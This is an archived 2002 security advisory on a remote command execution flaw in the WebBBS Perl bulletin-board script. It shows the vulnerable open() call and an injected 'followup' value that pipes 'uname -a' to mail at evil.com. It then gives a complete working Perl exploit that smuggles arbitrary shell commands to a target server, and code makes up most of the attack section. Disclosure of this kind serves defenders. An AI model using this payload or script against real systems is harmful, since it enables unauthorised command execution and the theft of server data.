TUCoPS :: Web BBS :: etc :: web5469.htm

WebBBS remote command execution
19th Jun 2002 [SBWID-5469]
COMMAND

	WebBBS remote command execution

SYSTEMS AFFECTED

	All versions as of (19 June 2002)

PROBLEM

	In Nerf gr0up [http://www.nerf.ru] advisory [#7] :
	

	WebBBS script allows command execution on server. This  script  does  no
	filtering and due to this remote  command  execution  is  possible.  The
	vulnerable code is shown below:
	

	 webbbs_post.pl: 

	

	...

	if ($FORM{\'followup\'}) { $followup = 

	\"$FORM{\'followup\'}\"; }

	...

	if ($followup) {

	...

			$subdir = \"bbs\".int($followup/1000);

			open 

	(FOLLOWUP,\"$dir/$subdir/$followup\");

	...

	

	

	Just change the value of  $followup  variable,  e.g  \"followup=10\"  to
	\"followup=10;uname   -a|mail   zlo@evil.com|\"    to    exploit    this
	vulnerability.
	

	 Exploit

	 =======

	

	#!/usr/bin/perl

	#

	#  nerF gr0up

	#

	#  exploit code for

	#  WebBBS by Darryl C. Burgdorf

	#  all version up to 5.00 are vulnerable

	#

	#

	#  this is an exploitation of \"followup\" bug.

	#  it allows remote attacker to execute shell 

	commands.

	#  you can find WebBBS script at 

	http://awsd.com/scripts/webbbs/

	#

	#  06.06.2002

	#  btr // nerf

	# nerf.ru

	

	use IO::Socket;

	

	        srand();

	        $script = \"/cgi-bin/webbbs/webbbs_config.pl\";

	        $command = \"uname -a|mail zlo@evil.com\";

	        $host = \"localhost\";

	        $port = 80;

	

	        $content = \"$content\" . \"name=\" . rand(254);

	        $content = \"$content\" . \"&email=\" . rand(254);

	        $content = \"$content\" . \"&subject=\" . 

	rand(254);

	        $content = \"$content\" . \"&body=\" . rand(254);

	        

	$content=\"$content\".\"&followup=\".rand(254).\"|$command|\";

	

	        $content_length = length($content);

	        $content_type = 

	\"application/x-www-form-urlencoded\";

	

	        if (@ARGV[0]) {$command=@ARGV[0];}

	        if (@ARGV[1]) {$host=@ARGV[1];}

	        if (@ARGV[2]) {$script=@ARGV[2];}

	

	        $buf = \"POST \" . \"$script\" . \"?post 

	HTTP/1.0\\n\";

	        $buf = \"$buf\" . \"Content-Type: 

	$content_type\\r\\nContent-Length:\";

	        $buf = \"$buf\" . 

	\"$content_length\\r\\n\\r\\n$content\", 0;

	

		print \"\\tnerF gr0up\\n\";

		print \"exploit: WebBBS (awsd.com), version up 

	to 5.00\\n\";

	

	        print \"sent:\\n$buf\\n\";

	

	if($socket = IO::Socket::INET->new(\"$host:$port\")){

	

	        print $socket \"$buf\";

	        read($socket,$buf,1500);

	        print \"recieved:\\n$buf\\n\";

	}

	

SOLUTION

	Check :
	

	http://awsd.com/scripts/webbbs/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH